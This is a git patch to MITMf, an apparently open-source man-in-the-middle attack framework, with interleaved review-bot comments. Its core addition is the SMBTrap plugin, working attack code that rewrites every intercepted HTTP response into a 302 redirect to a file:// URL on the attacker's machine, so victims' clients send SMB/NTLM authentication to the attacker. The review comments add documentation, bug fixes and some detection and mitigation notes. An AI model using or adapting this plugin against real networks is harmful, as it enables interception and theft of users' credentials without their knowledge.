From 840e202e5bd31e918c5eab3d6114be6071112171 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Fri, 22 May 2015 20:16:47 +0200 Subject: [PATCH] handleStatus() is now hooked through serverResponseStatus, were now able to modify the server response code and message added the SMBTrap plugin --- core/sergioproxy/ProxyPlugins.py | 2 +- core/servers/http/HTTPServer.py | 3 +++ core/sslstrip/ServerConnection.py | 1 + plugins/SMBTrap.py | 23 +++++++++++++++++++++++ plugins/TestPlugin.py | 2 +- plugins/plugin.py | 7 +++++++ 6 files changed, 36 insertions(+), 2 deletions(-) create mode 100644 plugins/SMBTrap.py diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index d9175a3..35d037d 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -44,7 +44,7 @@ class ProxyPlugins: _instance = None plist = [] - mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} + mthdDict = {"connectionMade": "clientRequest", "handleStatus": "serverResponseStatus", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"} pmthds = {} @staticmethod diff --git a/core/servers/http/HTTPServer.py b/core/servers/http/HTTPServer.py index ce3ba9a..9cb9043 100644 --- a/core/servers/http/HTTPServer.py +++ b/core/servers/http/HTTPServer.py @@ -14,6 +14,9 @@ class HTTPServer: return HTTPServer._instance + def addHandler(self, urlregex, handler, vhost=''): + self.application.add_handlers(vhost, [(urlregex, handler)]) + def start(self, port=80): self.application.listen(port) t = threading.Thread(name='HTTPserver', target=tornado.ioloop.IOLoop.instance().start) diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 74868f4..65503d1 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py 
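Review bot: `addHandler` in core/servers/http/HTTPServer.py has no docstring, and its `vhost=''` default is passed straight to Tornado's `add_handlers`, which treats that argument as a host-matching regular expression. A one-line docstring would spare plugin authors from reading Tornado to learn what the empty default matches, e.g. `'''Register handler for urlregex (a Tornado URL pattern) under the host pattern vhost.'''`. Because this method lets any plugin mount a handler on the shared listener, it may also be worth logging each registration so the set of exposed routes is visible in the debug log. The `HTTPServer` class starts outside the hunk.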
@@ -120,6 +120,7 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): + version, code, message = self.plugins.hook() mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) diff --git a/plugins/SMBTrap.py b/plugins/SMBTrap.py new file mode 100644 index 0000000..7110140 --- /dev/null +++ b/plugins/SMBTrap.py @@ -0,0 +1,23 @@ +import logging +import random +import string +from plugins.plugin import Plugin +from core.utils import SystemConfig + +mitmf_logger = logging.getLogger("mitmf") + +class SMBTrap(Plugin): + name = "SMBTrap" + optname = "smbtrap" + desc = "Exploits the SMBTrap vulnerability on connected clients" + version = "1.0" + has_opts = False + + def initialize(self, options): + self.ourip = SystemConfig.getIP(options.interface) + + def serverResponseStatus(self, request, version, code, message): + return (version, 302, "Found") + + def serverHeaders(self, response, request): + response.headers["Location"] = "file://{}/{}".format(self.ourip, ''.join(random.sample(string.ascii_uppercase + string.digits, 8))) \ No newline at end of file diff --git a/plugins/TestPlugin.py b/plugins/TestPlugin.py index cd470d5..4fd212c 100644 --- a/plugins/TestPlugin.py +++ b/plugins/TestPlugin.py @@ -10,7 +10,7 @@ class TestPlugin(Plugin): has_opts = False def initialize(self, options): - HTTPServer.getInstance().application.add_handlers('', [(r"/test", MainHandler)]) + HTTPServer.getInstance().addHandler(r"/test/(.*)", MainHandler) class MainHandler(tornado.web.RequestHandler): def get(self): diff --git a/plugins/plugin.py b/plugins/plugin.py index 0d5a324..1d9b82b 100644 --- a/plugins/plugin.py +++ b/plugins/plugin.py @@ -12,6 +12,7 @@ class Plugin(ConfigWatcher, object): optname = "generic" tree_info = list() desc = "" + version = "0.0" has_opts = False def initialize(self, options): 
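Review bot: In `handleStatus` the three arguments are overwritten by whatever `self.plugins.hook()` returns, and the tuple unpack has no guard. `hook()` is not part of this diff, so its return shape is inferred; if it ever yields `None` or anything other than three items (for example a plugin override that forgets its `return`), the unpack raises before `setResponseCode` is reached. Consider keeping the server's values as a fallback, e.g. `res = self.plugins.hook()` followed by `if res is not None and len(res) == 3: version, code, message = res`. It would also help to log the upstream status before the hook runs, because after this change the debug line records only the plugin-modified values and the logs no longer show what the server actually sent. The body of `handleStatus` may continue past the hunk.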
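Review bot: `SMBTrap` in plugins/SMBTrap.py has no class or method docstring, and both `serverResponseStatus` and `serverHeaders` act on every proxied response unconditionally, so nothing in the file states how wide its effect is. A class docstring along the lines of `'''Rewrites every proxied HTTP response into a 302 whose Location is a file:// URL on the proxy host.'''` would make that explicit to anyone auditing the plugin. Those two methods are also the observable footprint: an HTTP 302 carrying a `file://` Location is not something an ordinary web server sends, so it is a workable proxy or IDS signature, and limiting outbound SMB/NTLM from clients to known file servers blunts the effect. `mitmf_logger` is defined but never used in the file as shown, and the file ends without a trailing newline.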
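Review bot: The new pattern `r"/test/(.*)"` in plugins/TestPlugin.py adds a capture group, and Tornado passes each captured group to the handler method as a positional argument, but the context line below still shows `def get(self):`. A request to `/test/anything` would therefore fail with a TypeError unless the signature is changed elsewhere, and plain `/test` no longer matches at all. Either accept the argument, `def get(self, path):`, or use a pattern without a group such as `r"/test(?:/.*)?"`. The body of `MainHandler.get` lies outside the hunk.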
@@ -41,6 +42,12 @@ class Plugin(ConfigWatcher, object): ''' pass + def serverResponseStatus(self, request, version, code, message): + ''' + Handles server response HTTP version, code and message + ''' + return (version, code, message) + def serverResponse(self, response, request, data): ''' Handles all non-image responses by default, hooks handleResponse() (See Upsidedownternet for how to get images)
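Review bot: The docstring of `serverResponseStatus` does not state its return contract, which differs from the neighbouring hook whose body ends in `pass`: this one has to hand back a `(version, code, message)` tuple because `ServerConnection.handleStatus` unpacks the result. I would extend it to say so, e.g. `Must return (version, code, message); code is passed through int() by the caller.` It is also worth recording there that `request` is a parameter here although `handleStatus` itself receives only `version, code, message`, so it is presumably supplied by `hook()`, which is not visible in this diff. The `Plugin` class begins and continues outside the hunk.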